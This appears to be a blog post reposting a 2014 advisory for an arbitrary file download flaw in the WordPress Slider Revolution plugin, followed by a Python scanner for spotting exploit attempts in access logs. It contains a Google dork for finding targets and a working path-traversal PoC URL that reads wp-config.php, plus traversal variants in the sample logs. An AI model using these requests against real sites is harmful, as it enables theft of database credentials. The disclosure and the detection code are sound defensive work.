Slider Revolution Exploit

WordPress Plugin Slider Revolution <= 4.1.4 – Arbitrary File Download vulnerability

Time to update if you are using the Slider Revolution plugin, which can be obtained over at CodeCanyon. Not long ago an older version of it (3.0.95) was also found to have a vulnerability. The old version allowed for remote shell uploads; this was supposed to be fixed in newer releases. Well, they did fix it indeed, but at the same time seem to have added a new vulnerability to that plugin. I just wonder if I will find any log entries on my box. I guess I sure will, hehe (even though this site quite clearly does not use Slider Revolution).

# Exploit Title : WordPress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download vulnerability

# Exploit Author : Claudio Viviani

# Vendor Homepage : http://codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380

# Software Link : Premium plugin

# Dork Google: revslider.php “index of”

# Date : 2014-07-24

# Tested on : Windows 7 / Mozilla Firefox
Linux / Mozilla Firefox

######################

# Description

WordPress Slider Revolution Responsive <= 4.1.4 suffers from Arbitrary File Download vulnerability

######################

# PoC

http://localhost/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

#####################

Discovered By : Claudio Viviani

http://www.homelab.it

https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################
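To look for the request shape from the PoC above in a web server access log, a small scanner like the following can be used. It is an added example, not part of the advisory or of the original post; the combined log format, the constructed sample lines, the image-extension allowlist and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Access-log prefix in combined format (assumed): client IP, request line, status code.
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                     r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
IMAGE_EXT = (".jpg", ".jpeg", ".png", ".gif")  # assumption: what a slider legitimately serves

def classify_img(value):
    """Return why an img value looks like a file-read attempt, or None if benign."""
    for _ in range(3):  # peel nested percent-encoding, e.g. %252e%252e -> ..
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    value = value.replace("\\", "/")
    if ".." in value.split("/"):
        return "path traversal"
    if value.startswith("/"):
        return "absolute path"
    if not value.lower().endswith(IMAGE_EXT):
        return "non-image file"
    return None

def find_revslider_probes(lines):
    """Return one dict per revslider_show_image request with a suspicious img value."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not url.path.lower().endswith("/wp-admin/admin-ajax.php"):
            continue
        params = parse_qs(url.query)  # decodes one layer of percent-encoding
        if "revslider_show_image" not in params.get("action", []):
            continue
        for img in params.get("img", []):
            reason = classify_img(img)
            if reason:
                hits.append({"ip": m["ip"], "img": img, "status": int(m["status"]), "reason": reason})
    return hits

# Constructed sample lines (documentation IP ranges), not taken from a real server.
SAMPLE_LOG = [
    '203.0.113.7 - - [02/Aug/2014:10:11:12 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 3021 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [02/Aug/2014:10:12:40 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=%252e%252e%252fwp-config.php HTTP/1.1" 200 5 "-" "-"',
    '192.0.2.44 - - [02/Aug/2014:10:13:05 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=uploads/slide1.jpg HTTP/1.1" 200 48211 "-" "Mozilla/5.0"',
]
```

To scan a real log, pass the open file object to `find_revslider_probes`. Parameters sent in a POST body do not appear in an access log, so this only covers requests that carry them in the URL.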
